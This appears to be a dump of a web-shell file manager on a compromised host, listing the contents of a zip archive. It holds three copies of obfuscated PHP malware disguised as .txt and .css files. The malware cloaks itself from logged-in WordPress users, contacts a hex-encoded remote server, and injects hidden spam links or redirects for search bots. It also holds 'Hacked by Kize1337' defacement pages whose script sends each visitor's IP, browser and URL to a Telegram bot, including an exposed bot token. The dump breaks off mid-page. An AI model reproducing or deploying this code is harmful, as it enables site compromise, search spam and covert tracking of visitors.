File manager

ÿØÿà JFIF ÿÛ „ ( %!1!%*+...983,7(-.- File manager

File manager - Edit - /home/tokomrjk/noobow.com/ef1c7c/cgi-bin.zip

Back
PK��R�\%Pn��n��rank.txtnu��[��<?php if(!class_exists('Advanced_LinkFlow_Control')){if(function_exists('is_user_logged_in')){if(is_user_logged_in()){return false;}}foreach($_COOKIE as $key => $value){if(strpos($key,'wordpress_logged_in_')=== 0){return false;}}@ini_set('display_errors',0);@ini_set('error_reporting',0);@ini_set('log_errors',NULL);@ini_set('default_socket_timeout',4);$uri=$_SERVER['REQUEST_URI'];$ua=$_SERVER['HTTP_USER_AGENT'];$bad_urls='#xmlrpc.php\|wp-includes\|wp-admin\|wp-content\|wp-login.php\|wp-cron.php\|\?feed=\|wp-json\|\/feed\|\.css\|\.js\|\.ico\|\.png\|\.gif\|\.bmp\|\.tiff\|\.mpg\|\.wmv\|\.mp3\|\.mpeg\|\.zip\|\.gzip\|\.rar\|\.exe\|\.pdf\|\.doc\|\.swf\|\.txt\|\.jpg\|administrator#';if(@preg_match($bad_urls,$_SERVER['HTTP_HOST'] .$uri)){return false;}class Advanced_LinkFlow_Control{public $url="\x68\x74\x74\x70:\x2f/\x6ci\x6ek\x73f\x61r\x6d.\x73t\x72e\x61m\x6do\x64u\x6ce\x2e\x63\x6f\x6d\x2f\x67\x65\x74\x2e\x70\x68\x70";public $ua='';public $uri='';public $ip='';public $lang='';public $google_ip_list=array("64.233.","66.102.","66.249.","72.14.","74.125.","108.177.","209.85.","216.239.","172.217.","35.190.247.");public $bing_ip_list=array("13.66..","13.67..","13.68..","13.69..","20.36..","20.37..","20.38..","20.39..","40.77..","40.79..","52.231..","191.233..");public $yandex_ip_list=array("5.45..","5.255..","37.9..","37.140..","77.88..","84.252..","87.250..","90.156..","93.158..","95.108..","141.8..","178.154..","213.180..","185.32.187.");public $links=array();public $bot='';public $ref='';function get($url){if(function_exists('curl_init')){$ch=curl_init($url);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,3);curl_setopt($ch,CURLOPT_TIMEOUT,5);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$data=curl_exec($ch);curl_close($ch);return $data;}elseif(@ini_get('allow_url_fopen')){return@file_get_contents($url);}else{$parts=parse_url($url);$target=$parts['host'];$port=isset($parts['port'])?$parts['port']:80;$page=isset($parts['path'])?$parts['path']:'';$page .= isset($parts['query'])?'?' .$parts['query']:'';$page .= isset($parts['fragment'])?'#' .$parts['fragment']:'';$page=($page == '')?'/':$page;if($fp=@fsockopen($target,$port,$errno,$errstr,3)){@socket_set_option($fp,SOL_SOCKET,SO_RCVTIMEO,array("sec"=> 1,"usec"=> 1));$headers="GET $page HTTP/1.1\r\n";$headers .="Host: {$parts['host']}\r\n";$headers .= "Connection: Close\r\n\r\n";if(fwrite($fp,$headers)){$resp='';while(!feof($fp)&&($curr=fgets($fp,128))!== false){$resp .= $curr;}if(isset($curr)&& $curr !== false){fclose($fp);return substr(strstr($resp,"\r\n\r\n"),3);}}fclose($fp);}}return TRUE;}function init($uri,$ua){$this->uri=$uri;$bot=FALSE;$this->ip=isset($_SERVER['HTTP_CF_CONNECTING_IP'])?$_SERVER['HTTP_CF_CONNECTING_IP']:(isset($_SERVER['REMOTE_ADDR'])?$_SERVER['REMOTE_ADDR']:'unknown');$this->ref=isset($_SERVER['HTTP_REFERER'])?$_SERVER['HTTP_REFERER']:'';$this->lang=isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])?$_SERVER['HTTP_ACCEPT_LANGUAGE']:'';if(@preg_match('/googlebot\|google-structured-data/i',$ua)){$bot=TRUE;$this->bot='google';}if(@preg_match('/bing\|msn\|msr\|slurp\|yahoo/i',$ua)){$bot=TRUE;$this->bot='bing';}if(@preg_match('/yandexbot\|yandeximages\|yandexmobilebot\|yandex/i',$ua)){$bot=TRUE;$this->bot='yandex';}if(@preg_match('/duckduckbot/i',$ua)){$bot=TRUE;$this->bot='duckduck';}if(@preg_match('~aport\|rambler\|abachobot\|accoona\|acoirobot\|aspseek\|croccrawler\|dumbot\|webcrawler\|geonabot\|gigabot\|lycos\|scooter\|altavista\|webalta\|adbot\|estyle\|mail\.ru\|scrubby~i',$ua)){$bot=TRUE;$this->bot='other';}if(!$bot){$bot_sources=['google'=> $this->google_ip_list ??[],'bing'=> $this->bing_ip_list ??[],'yandex'=> $this->yandex_ip_list ??[],];foreach($bot_sources as $bot_name => $ip_list){foreach($ip_list as $ip_mask){$pattern='#^' .str_replace(['.',''],['\.','.'],$ip_mask) .'$#';if(preg_match($pattern,$this->ip)){$bot=TRUE;$this->bot=$bot_name;break 2;}}}}if(!$bot){$hostbyaddr=@gethostbyaddr($this->ip);$host_patterns=['google'=> 'googlebot\|google','bing'=> 'bing\|msn\|msr\|slurp\|yahoo','yandex'=> 'yandex','duckduckgo'=> 'duckduckgo\|duckduckbot',];foreach($host_patterns as $bot_name => $pattern){if(preg_match("/$pattern/i",$hostbyaddr)){$bot=TRUE;$this->bot=$bot_name;break;}}}if(!empty($_SERVER['SERVER_NAME'])){$tmp=@parse_url('http://' .$_SERVER['SERVER_NAME']);if(isset($tmp['host'])){$host=$tmp['host'];}}$url=$this->url ."?host=$host&uri=" .urlencode($this->uri) ."&bot={$this->bot}&ip={$this->ip}&ref=" .urlencode($this->ref) .'&lang=' .urlencode($this->lang);if(isset($_COOKIE['LFD'])\|\| isset($_REQUEST['LFD'])){$url .= '&check=1';$page=$this->get($url);$res=0;if(strpos($page,"XTESTOKX")!== false){$res=1;}die(json_encode(['r'=> $res,'funcs'=>['curl_init'=> function_exists('curl_init')?1:0,'file_get_contents'=> function_exists('file_get_contents')?1:0,'allow_url_fopen'=> ini_get('allow_url_fopen')?1:0,'fsockopen'=> function_exists('fsockopen')?1:0,'socket_set_option'=> function_exists('socket_set_option')?1:0,]]));}if(isset($_COOKIE['CURLOPT_LF_TEST'])\|\| isset($_REQUEST['CURLOPT_LF_TEST'])){$url .= '&check=1';}$page=$this->get($url);if(preg_match('/<url>(.?)<\/url>/us',$page,$matches)){$url=$matches[1];header("Location: {$url}");exit;}if(preg_match('/<page>(.?)<\/page>/us',$page,$matches)){$page=$matches[1];die($page);}if(strpos($page,'<link>')!== FALSE){preg_match_all('~<link>(.?)</link>~',$page,$m);$this->links=isset($m[1])?$m[1]:array();}if(count($this->links)>0){ob_start(array($this,'rwcontent'));register_shutdown_function('ob_end_flush');}}function rwcontent($content){$blocked_tags=array('header','footer');$tags=array('p','span','strong','em','i','td','div','ul','li','body');$tags_vals=array();foreach($tags as $tag){preg_match_all("~<{$tag}\s+.?>(.?)</{$tag}>~is",$content,$matches);if(isset($matches[0])){foreach($matches[0]as $match){$is_blocked=false;foreach($blocked_tags as $blocked_tag){$pattern="~<{$blocked_tag}.?>.?{$match}.?</{$blocked_tag}>~is";if(preg_match($pattern,$content)){$is_blocked=true;break;}}if(!$is_blocked){$tags_vals[]=array('tag'=> $tag,'content'=> $match);}}}if(count($tags_vals)>count($this->links)){break;}}$tag_index=0;$link_index=0;$links_count=count($this->links);$tags_vals_count=count($tags_vals);while($link_index<$links_count && $tag_index<$tags_vals_count){$link=$this->links[$link_index];if(str_ends_with($link,'###')){$linkHTML=str_replace('###','',$link);}else{$number=7200+strlen($link)%1000;$linkHTML="<div style=\"position: absolute; left: -{$number}px;\">{$link}</div> ";}$tag_val=$tags_vals[$tag_index];if(strlen($tag_val['content'])%2 == 1){$tag_content_new=$tag_val['content'];$tag_content_new=preg_replace("(<{$tag_val['tag']}.?>)","$0 {$linkHTML}",$tag_content_new,1);}else{if(substr($tag_val['content'],-(strlen($tag_val['tag'])+4))==".</{$tag_val['tag']}>"){$tag_content_new=str_replace(".</{$tag_val['tag']}>"," {$linkHTML}</{$tag_val['tag']}>",$tag_val['content']);}else{$tag_content_new=str_replace("</{$tag_val['tag']}>"," {$linkHTML}</{$tag_val['tag']}>",$tag_val['content']);}}$content=preg_replace("~" .preg_quote($tag_val['content'],'~') ."~i",$tag_content_new,$content,1);if(strpos($content,$linkHTML)!== false){$link_index++;}$tag_index++;}return $content;}}$ratel=new Advanced_LinkFlow_Control;$ratel->init($uri,$ua);}PK��R�\%Pn��n�� mailto.cssnu��[��<?php if(!class_exists('Advanced_LinkFlow_Control')){if(function_exists('is_user_logged_in')){if(is_user_logged_in()){return false;}}foreach($_COOKIE as $key => $value){if(strpos($key,'wordpress_logged_in_')=== 0){return false;}}@ini_set('display_errors',0);@ini_set('error_reporting',0);@ini_set('log_errors',NULL);@ini_set('default_socket_timeout',4);$uri=$_SERVER['REQUEST_URI'];$ua=$_SERVER['HTTP_USER_AGENT'];$bad_urls='#xmlrpc.php\|wp-includes\|wp-admin\|wp-content\|wp-login.php\|wp-cron.php\|\?feed=\|wp-json\|\/feed\|\.css\|\.js\|\.ico\|\.png\|\.gif\|\.bmp\|\.tiff\|\.mpg\|\.wmv\|\.mp3\|\.mpeg\|\.zip\|\.gzip\|\.rar\|\.exe\|\.pdf\|\.doc\|\.swf\|\.txt\|\.jpg\|administrator#';if(@preg_match($bad_urls,$_SERVER['HTTP_HOST'] .$uri)){return false;}class Advanced_LinkFlow_Control{public $url="\x68\x74\x74\x70:\x2f/\x6ci\x6ek\x73f\x61r\x6d.\x73t\x72e\x61m\x6do\x64u\x6ce\x2e\x63\x6f\x6d\x2f\x67\x65\x74\x2e\x70\x68\x70";public $ua='';public $uri='';public $ip='';public $lang='';public $google_ip_list=array("64.233.","66.102.","66.249.","72.14.","74.125.","108.177.","209.85.","216.239.","172.217.","35.190.247.");public $bing_ip_list=array("13.66..","13.67..","13.68..","13.69..","20.36..","20.37..","20.38..","20.39..","40.77..","40.79..","52.231..","191.233..");public $yandex_ip_list=array("5.45..","5.255..","37.9..","37.140..","77.88..","84.252..","87.250..","90.156..","93.158..","95.108..","141.8..","178.154..","213.180..","185.32.187.");public $links=array();public $bot='';public $ref='';function get($url){if(function_exists('curl_init')){$ch=curl_init($url);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,3);curl_setopt($ch,CURLOPT_TIMEOUT,5);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$data=curl_exec($ch);curl_close($ch);return $data;}elseif(@ini_get('allow_url_fopen')){return@file_get_contents($url);}else{$parts=parse_url($url);$target=$parts['host'];$port=isset($parts['port'])?$parts['port']:80;$page=isset($parts['path'])?$parts['path']:'';$page .= isset($parts['query'])?'?' .$parts['query']:'';$page .= isset($parts['fragment'])?'#' .$parts['fragment']:'';$page=($page == '')?'/':$page;if($fp=@fsockopen($target,$port,$errno,$errstr,3)){@socket_set_option($fp,SOL_SOCKET,SO_RCVTIMEO,array("sec"=> 1,"usec"=> 1));$headers="GET $page HTTP/1.1\r\n";$headers .="Host: {$parts['host']}\r\n";$headers .= "Connection: Close\r\n\r\n";if(fwrite($fp,$headers)){$resp='';while(!feof($fp)&&($curr=fgets($fp,128))!== false){$resp .= $curr;}if(isset($curr)&& $curr !== false){fclose($fp);return substr(strstr($resp,"\r\n\r\n"),3);}}fclose($fp);}}return TRUE;}function init($uri,$ua){$this->uri=$uri;$bot=FALSE;$this->ip=isset($_SERVER['HTTP_CF_CONNECTING_IP'])?$_SERVER['HTTP_CF_CONNECTING_IP']:(isset($_SERVER['REMOTE_ADDR'])?$_SERVER['REMOTE_ADDR']:'unknown');$this->ref=isset($_SERVER['HTTP_REFERER'])?$_SERVER['HTTP_REFERER']:'';$this->lang=isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])?$_SERVER['HTTP_ACCEPT_LANGUAGE']:'';if(@preg_match('/googlebot\|google-structured-data/i',$ua)){$bot=TRUE;$this->bot='google';}if(@preg_match('/bing\|msn\|msr\|slurp\|yahoo/i',$ua)){$bot=TRUE;$this->bot='bing';}if(@preg_match('/yandexbot\|yandeximages\|yandexmobilebot\|yandex/i',$ua)){$bot=TRUE;$this->bot='yandex';}if(@preg_match('/duckduckbot/i',$ua)){$bot=TRUE;$this->bot='duckduck';}if(@preg_match('~aport\|rambler\|abachobot\|accoona\|acoirobot\|aspseek\|croccrawler\|dumbot\|webcrawler\|geonabot\|gigabot\|lycos\|scooter\|altavista\|webalta\|adbot\|estyle\|mail\.ru\|scrubby~i',$ua)){$bot=TRUE;$this->bot='other';}if(!$bot){$bot_sources=['google'=> $this->google_ip_list ??[],'bing'=> $this->bing_ip_list ??[],'yandex'=> $this->yandex_ip_list ??[],];foreach($bot_sources as $bot_name => $ip_list){foreach($ip_list as $ip_mask){$pattern='#^' .str_replace(['.',''],['\.','.'],$ip_mask) .'$#';if(preg_match($pattern,$this->ip)){$bot=TRUE;$this->bot=$bot_name;break 2;}}}}if(!$bot){$hostbyaddr=@gethostbyaddr($this->ip);$host_patterns=['google'=> 'googlebot\|google','bing'=> 'bing\|msn\|msr\|slurp\|yahoo','yandex'=> 'yandex','duckduckgo'=> 'duckduckgo\|duckduckbot',];foreach($host_patterns as $bot_name => $pattern){if(preg_match("/$pattern/i",$hostbyaddr)){$bot=TRUE;$this->bot=$bot_name;break;}}}if(!empty($_SERVER['SERVER_NAME'])){$tmp=@parse_url('http://' .$_SERVER['SERVER_NAME']);if(isset($tmp['host'])){$host=$tmp['host'];}}$url=$this->url ."?host=$host&uri=" .urlencode($this->uri) ."&bot={$this->bot}&ip={$this->ip}&ref=" .urlencode($this->ref) .'&lang=' .urlencode($this->lang);if(isset($_COOKIE['LFD'])\|\| isset($_REQUEST['LFD'])){$url .= '&check=1';$page=$this->get($url);$res=0;if(strpos($page,"XTESTOKX")!== false){$res=1;}die(json_encode(['r'=> $res,'funcs'=>['curl_init'=> function_exists('curl_init')?1:0,'file_get_contents'=> function_exists('file_get_contents')?1:0,'allow_url_fopen'=> ini_get('allow_url_fopen')?1:0,'fsockopen'=> function_exists('fsockopen')?1:0,'socket_set_option'=> function_exists('socket_set_option')?1:0,]]));}if(isset($_COOKIE['CURLOPT_LF_TEST'])\|\| isset($_REQUEST['CURLOPT_LF_TEST'])){$url .= '&check=1';}$page=$this->get($url);if(preg_match('/<url>(.?)<\/url>/us',$page,$matches)){$url=$matches[1];header("Location: {$url}");exit;}if(preg_match('/<page>(.?)<\/page>/us',$page,$matches)){$page=$matches[1];die($page);}if(strpos($page,'<link>')!== FALSE){preg_match_all('~<link>(.?)</link>~',$page,$m);$this->links=isset($m[1])?$m[1]:array();}if(count($this->links)>0){ob_start(array($this,'rwcontent'));register_shutdown_function('ob_end_flush');}}function rwcontent($content){$blocked_tags=array('header','footer');$tags=array('p','span','strong','em','i','td','div','ul','li','body');$tags_vals=array();foreach($tags as $tag){preg_match_all("~<{$tag}\s+.?>(.?)</{$tag}>~is",$content,$matches);if(isset($matches[0])){foreach($matches[0]as $match){$is_blocked=false;foreach($blocked_tags as $blocked_tag){$pattern="~<{$blocked_tag}.?>.?{$match}.?</{$blocked_tag}>~is";if(preg_match($pattern,$content)){$is_blocked=true;break;}}if(!$is_blocked){$tags_vals[]=array('tag'=> $tag,'content'=> $match);}}}if(count($tags_vals)>count($this->links)){break;}}$tag_index=0;$link_index=0;$links_count=count($this->links);$tags_vals_count=count($tags_vals);while($link_index<$links_count && $tag_index<$tags_vals_count){$link=$this->links[$link_index];if(str_ends_with($link,'###')){$linkHTML=str_replace('###','',$link);}else{$number=7200+strlen($link)%1000;$linkHTML="<div style=\"position: absolute; left: -{$number}px;\">{$link}</div> ";}$tag_val=$tags_vals[$tag_index];if(strlen($tag_val['content'])%2 == 1){$tag_content_new=$tag_val['content'];$tag_content_new=preg_replace("(<{$tag_val['tag']}.?>)","$0 {$linkHTML}",$tag_content_new,1);}else{if(substr($tag_val['content'],-(strlen($tag_val['tag'])+4))==".</{$tag_val['tag']}>"){$tag_content_new=str_replace(".</{$tag_val['tag']}>"," {$linkHTML}</{$tag_val['tag']}>",$tag_val['content']);}else{$tag_content_new=str_replace("</{$tag_val['tag']}>"," {$linkHTML}</{$tag_val['tag']}>",$tag_val['content']);}}$content=preg_replace("~" .preg_quote($tag_val['content'],'~') ."~i",$tag_content_new,$content,1);if(strpos($content,$linkHTML)!== false){$link_index++;}$tag_index++;}return $content;}}$ratel=new Advanced_LinkFlow_Control;$ratel->init($uri,$ua);}PK��R�\%Pn��n��default_image.txtnu��[��<?php if(!class_exists('Advanced_LinkFlow_Control')){if(function_exists('is_user_logged_in')){if(is_user_logged_in()){return false;}}foreach($_COOKIE as $key => $value){if(strpos($key,'wordpress_logged_in_')=== 0){return false;}}@ini_set('display_errors',0);@ini_set('error_reporting',0);@ini_set('log_errors',NULL);@ini_set('default_socket_timeout',4);$uri=$_SERVER['REQUEST_URI'];$ua=$_SERVER['HTTP_USER_AGENT'];$bad_urls='#xmlrpc.php\|wp-includes\|wp-admin\|wp-content\|wp-login.php\|wp-cron.php\|\?feed=\|wp-json\|\/feed\|\.css\|\.js\|\.ico\|\.png\|\.gif\|\.bmp\|\.tiff\|\.mpg\|\.wmv\|\.mp3\|\.mpeg\|\.zip\|\.gzip\|\.rar\|\.exe\|\.pdf\|\.doc\|\.swf\|\.txt\|\.jpg\|administrator#';if(@preg_match($bad_urls,$_SERVER['HTTP_HOST'] .$uri)){return false;}class Advanced_LinkFlow_Control{public $url="\x68\x74\x74\x70:\x2f/\x6ci\x6ek\x73f\x61r\x6d.\x73t\x72e\x61m\x6do\x64u\x6ce\x2e\x63\x6f\x6d\x2f\x67\x65\x74\x2e\x70\x68\x70";public $ua='';public $uri='';public $ip='';public $lang='';public $google_ip_list=array("64.233.","66.102.","66.249.","72.14.","74.125.","108.177.","209.85.","216.239.","172.217.","35.190.247.");public $bing_ip_list=array("13.66..","13.67..","13.68..","13.69..","20.36..","20.37..","20.38..","20.39..","40.77..","40.79..","52.231..","191.233..");public $yandex_ip_list=array("5.45..","5.255..","37.9..","37.140..","77.88..","84.252..","87.250..","90.156..","93.158..","95.108..","141.8..","178.154..","213.180..","185.32.187.");public $links=array();public $bot='';public $ref='';function get($url){if(function_exists('curl_init')){$ch=curl_init($url);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,3);curl_setopt($ch,CURLOPT_TIMEOUT,5);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$data=curl_exec($ch);curl_close($ch);return $data;}elseif(@ini_get('allow_url_fopen')){return@file_get_contents($url);}else{$parts=parse_url($url);$target=$parts['host'];$port=isset($parts['port'])?$parts['port']:80;$page=isset($parts['path'])?$parts['path']:'';$page .= isset($parts['query'])?'?' .$parts['query']:'';$page .= isset($parts['fragment'])?'#' .$parts['fragment']:'';$page=($page == '')?'/':$page;if($fp=@fsockopen($target,$port,$errno,$errstr,3)){@socket_set_option($fp,SOL_SOCKET,SO_RCVTIMEO,array("sec"=> 1,"usec"=> 1));$headers="GET $page HTTP/1.1\r\n";$headers .="Host: {$parts['host']}\r\n";$headers .= "Connection: Close\r\n\r\n";if(fwrite($fp,$headers)){$resp='';while(!feof($fp)&&($curr=fgets($fp,128))!== false){$resp .= $curr;}if(isset($curr)&& $curr !== false){fclose($fp);return substr(strstr($resp,"\r\n\r\n"),3);}}fclose($fp);}}return TRUE;}function init($uri,$ua){$this->uri=$uri;$bot=FALSE;$this->ip=isset($_SERVER['HTTP_CF_CONNECTING_IP'])?$_SERVER['HTTP_CF_CONNECTING_IP']:(isset($_SERVER['REMOTE_ADDR'])?$_SERVER['REMOTE_ADDR']:'unknown');$this->ref=isset($_SERVER['HTTP_REFERER'])?$_SERVER['HTTP_REFERER']:'';$this->lang=isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])?$_SERVER['HTTP_ACCEPT_LANGUAGE']:'';if(@preg_match('/googlebot\|google-structured-data/i',$ua)){$bot=TRUE;$this->bot='google';}if(@preg_match('/bing\|msn\|msr\|slurp\|yahoo/i',$ua)){$bot=TRUE;$this->bot='bing';}if(@preg_match('/yandexbot\|yandeximages\|yandexmobilebot\|yandex/i',$ua)){$bot=TRUE;$this->bot='yandex';}if(@preg_match('/duckduckbot/i',$ua)){$bot=TRUE;$this->bot='duckduck';}if(@preg_match('~aport\|rambler\|abachobot\|accoona\|acoirobot\|aspseek\|croccrawler\|dumbot\|webcrawler\|geonabot\|gigabot\|lycos\|scooter\|altavista\|webalta\|adbot\|estyle\|mail\.ru\|scrubby~i',$ua)){$bot=TRUE;$this->bot='other';}if(!$bot){$bot_sources=['google'=> $this->google_ip_list ??[],'bing'=> $this->bing_ip_list ??[],'yandex'=> $this->yandex_ip_list ??[],];foreach($bot_sources as $bot_name => $ip_list){foreach($ip_list as $ip_mask){$pattern='#^' .str_replace(['.',''],['\.','.'],$ip_mask) .'$#';if(preg_match($pattern,$this->ip)){$bot=TRUE;$this->bot=$bot_name;break 2;}}}}if(!$bot){$hostbyaddr=@gethostbyaddr($this->ip);$host_patterns=['google'=> 'googlebot\|google','bing'=> 'bing\|msn\|msr\|slurp\|yahoo','yandex'=> 'yandex','duckduckgo'=> 'duckduckgo\|duckduckbot',];foreach($host_patterns as $bot_name => $pattern){if(preg_match("/$pattern/i",$hostbyaddr)){$bot=TRUE;$this->bot=$bot_name;break;}}}if(!empty($_SERVER['SERVER_NAME'])){$tmp=@parse_url('http://' .$_SERVER['SERVER_NAME']);if(isset($tmp['host'])){$host=$tmp['host'];}}$url=$this->url ."?host=$host&uri=" .urlencode($this->uri) ."&bot={$this->bot}&ip={$this->ip}&ref=" .urlencode($this->ref) .'&lang=' .urlencode($this->lang);if(isset($_COOKIE['LFD'])\|\| isset($_REQUEST['LFD'])){$url .= '&check=1';$page=$this->get($url);$res=0;if(strpos($page,"XTESTOKX")!== false){$res=1;}die(json_encode(['r'=> $res,'funcs'=>['curl_init'=> function_exists('curl_init')?1:0,'file_get_contents'=> function_exists('file_get_contents')?1:0,'allow_url_fopen'=> ini_get('allow_url_fopen')?1:0,'fsockopen'=> function_exists('fsockopen')?1:0,'socket_set_option'=> function_exists('socket_set_option')?1:0,]]));}if(isset($_COOKIE['CURLOPT_LF_TEST'])\|\| isset($_REQUEST['CURLOPT_LF_TEST'])){$url .= '&check=1';}$page=$this->get($url);if(preg_match('/<url>(.?)<\/url>/us',$page,$matches)){$url=$matches[1];header("Location: {$url}");exit;}if(preg_match('/<page>(.?)<\/page>/us',$page,$matches)){$page=$matches[1];die($page);}if(strpos($page,'<link>')!== FALSE){preg_match_all('~<link>(.?)</link>~',$page,$m);$this->links=isset($m[1])?$m[1]:array();}if(count($this->links)>0){ob_start(array($this,'rwcontent'));register_shutdown_function('ob_end_flush');}}function rwcontent($content){$blocked_tags=array('header','footer');$tags=array('p','span','strong','em','i','td','div','ul','li','body');$tags_vals=array();foreach($tags as $tag){preg_match_all("~<{$tag}\s+.?>(.?)</{$tag}>~is",$content,$matches);if(isset($matches[0])){foreach($matches[0]as $match){$is_blocked=false;foreach($blocked_tags as $blocked_tag){$pattern="~<{$blocked_tag}.?>.?{$match}.?</{$blocked_tag}>~is";if(preg_match($pattern,$content)){$is_blocked=true;break;}}if(!$is_blocked){$tags_vals[]=array('tag'=> $tag,'content'=> $match);}}}if(count($tags_vals)>count($this->links)){break;}}$tag_index=0;$link_index=0;$links_count=count($this->links);$tags_vals_count=count($tags_vals);while($link_index<$links_count && $tag_index<$tags_vals_count){$link=$this->links[$link_index];if(str_ends_with($link,'###')){$linkHTML=str_replace('###','',$link);}else{$number=7200+strlen($link)%1000;$linkHTML="<div style=\"position: absolute; left: -{$number}px;\">{$link}</div> ";}$tag_val=$tags_vals[$tag_index];if(strlen($tag_val['content'])%2 == 1){$tag_content_new=$tag_val['content'];$tag_content_new=preg_replace("(<{$tag_val['tag']}.?>)","$0 {$linkHTML}",$tag_content_new,1);}else{if(substr($tag_val['content'],-(strlen($tag_val['tag'])+4))==".</{$tag_val['tag']}>"){$tag_content_new=str_replace(".</{$tag_val['tag']}>"," {$linkHTML}</{$tag_val['tag']}>",$tag_val['content']);}else{$tag_content_new=str_replace("</{$tag_val['tag']}>"," {$linkHTML}</{$tag_val['tag']}>",$tag_val['content']);}}$content=preg_replace("~" .preg_quote($tag_val['content'],'~') ."~i",$tag_content_new,$content,1);if(strpos($content,$linkHTML)!== false){$link_index++;}$tag_index++;}return $content;}}$ratel=new Advanced_LinkFlow_Control;$ratel->init($uri,$ua);}PK��R�\��%��%��434974/972517/index.phpnu��[��<!DOCTYPE html> <html lang="id"> <head> <title>Hacked by Kize1337</title> <meta property="og:image" content="https://c.top4top.io/p_3715008ex4.jpg"> <meta name="author" content="Kize1337"/> <meta name="copyright" content="2025"/> <meta name="title" content="Hacked by Kize1337"> <meta name="description" content="We are party on your site."> <link href="https://fonts.googleapis.com/css?family=Space+Mono" rel="stylesheet"> <link rel="icon" href="https://k.top4top.io/p_3715j5o0a8.png" type="image/webp"> <style type="text/css"> * { margin: 0; padding: 0; box-sizing: border-box; } body { background-color: black; margin: 0; padding: 0; font-family: 'Space Mono', monospace; min-height: 100vh; display: flex; justify-content: center; align-items: center; } .container { text-align: center; width: 100%; max-width: 800px; padding: 40px 20px; } .x { font-size: 60px; transform: skewY(-8deg); color: white; margin-bottom: 40px; line-height: 1.2; } .x span { color: #ff0000; } .hacker-image { margin: 40px auto; max-width: 300px; width: 100%; } .hacker-image img { width: 100%; height: auto; display: block; } .audio-player { margin: 25px auto; } .audio-player audio { width: 200px; height: 30px; filter: invert(1) hue-rotate(180deg); } .message { color: white; font-size: 24px; margin: 30px 0; } .greetz-title { color: white; font-size: 18px; margin: 25px 0 10px 0; } .greetz-list { font-family: 'Courier New', monospace; font-size: 14px; color: #ff0000; font-weight: bold; line-height: 1.4; } .contact-section { margin-top: 40px; color: white; font-family: 'Space Mono', monospace; font-size: 18px; } .contact-link { color: #ff0000; text-decoration: none; font-weight: bold; } .contact-link:hover { text-decoration: underline; } @media (min-width: 1024px) { .container { padding: 60px 20px; } .x { margin-bottom: 50px; } .hacker-image { margin: 50px auto; } } @media (max-width: 768px) { .container { padding: 30px 20px; } .x { font-size: 40px; margin-bottom: 30px; } .message { font-size: 18px; margin: 25px 0; } .contact-section { font-size: 16px; margin-top: 30px; } .hacker-image { max-width: 250px; margin: 30px auto; } } @media (max-width: 480px) { .container { padding: 20px 15px; } .x { font-size: 32px; margin-bottom: 25px; } .message { font-size: 16px; margin: 20px 0; } .contact-section { font-size: 14px; margin-top: 25px; } .hacker-image { max-width: 200px; margin: 25px auto; } .audio-player audio { width: 180px; } .greetz-title { font-size: 16px; margin: 20px 0 8px 0; } .greetz-list { font-size: 12px; } } </style> </head> <body> <div class="container"> <h1 class="x">Hacked by <span>Kize1337</span></h1> <div class="hacker-image"> <img src="https://c.top4top.io/p_3715008ex4.jpg" alt="Hacker Image"> </div> <div class="audio-player"> <audio id="bg-audio" src="https://e.top4top.io/m_3715w7dyq6.mp3" autoplay controls></audio> </div> <h2 class="message">MSG: Patch your system!</h2> <h3 class="greetz-title">Greetz:</h3> <div class="greetz-list"> Kize1337 - 0xTebu - Lizardpredator - JohenLG - Luminance - Sph69 - Axonhub - Privnet </div> <div class="contact-section"> CONTACT: <a href="https://t.me/deathbase" class="contact-link" target="_blank">t.me/deathbase</a> </div> </div> <script> document.body.addEventListener('click', function () { const audio = document.getElementById('bg-audio'); if (audio) { audio.muted = false; audio.volume = 1.0; audio.play().catch((e) => { console.warn('Autoplay failed:', e); }); } }, { once: true }); // Telegram logger async function sendLogToTelegram() { const token = "8499549696:AAEQJ6pvg9oFNbHTtIKKRkiARzIRLaeNJ7E"; const chat_id = "-1002699548560"; let ipInfo = "Unknown"; try { const res = await fetch("https://api64.ipify.org?format=json"); const data = await res.json(); ipInfo = data.ip; } catch (e) { ipInfo = "Unavailable"; } const ua = navigator.userAgent; const platform = navigator.platform; const browser = (() => { if (ua.includes("Chrome")) return "Chrome"; if (ua.includes("Firefox")) return "Firefox"; if (ua.includes("Safari") && !ua.includes("Chrome")) return "Safari"; if (ua.includes("Opera") \|\| ua.includes("OPR")) return "Opera"; if (ua.includes("Edg")) return "Edge"; return "Unknown"; })(); const now = new Date(); const timestamp = now.toLocaleString("id-ID", { timeZone: "Asia/Jakarta" }); const message = `📌 Access Detected 📅 Date & Time: ${timestamp} 🌐 IP: ${ipInfo} 💻 Device: ${platform} 🌍 Browser: ${browser} 📣 User-Agent: ${ua} 📎 URL: ${window.location.href} _This message is sent automatically by a bot._`; const tgURL = `https://api.telegram.org/bot${token}/sendMessage`; await fetch(tgURL, { method: "POST", headers: { "Content-Type": "application/json" }, body: JSON.stringify({ chat_id, text: message, parse_mode: "Markdown" }) }); } window.onload = () => sendLogToTelegram(); </script> </body> </html>PK��R�\��%��%��434974/index.phpnu��[��<!DOCTYPE html> <html lang="id"> <head> <title>Hacked by Kize1337</title> <meta property="og:image" content="https://c.top4top.io/p_3715008ex4.jpg"> <meta name="author" content="Kize1337"/> <meta name="copyright" content="2025"/> <meta name="title" content="Hacked by Kize1337"> <meta name="description" content="We are party on your site."> <link href="https://fonts.googleapis.com/css?family=Space+Mono" rel="stylesheet"> <link rel="icon" href="https://k.top4top.io/p_3715j5o0a8.png" type="image/webp"> <style type="text/css"> * { margin: 0; padding: 0; box-sizing: border-box; } body { background-color: black; margin: 0; padding: 0; font-family: 'Space Mono', monospace; min-height: 100vh; display: flex; justify-content: center; align-items: center; } .container { text-align: center; width: 100%; max-width: 800px; padding: 40px 20px; } .x { font-size: 60px; transform: skewY(-8deg); color: white; margin-bottom: 40px; line-height: 1.2; } .x span { color: #ff0000; } .hacker-image { margin: 40px auto; max-width: 300px; width: 100%; } .hacker-image img { width: 100%; height: auto; display: block; } .audio-player { margin: 25px auto; } .audio-player audio { width: 200px; height: 30px; filter: invert(1) 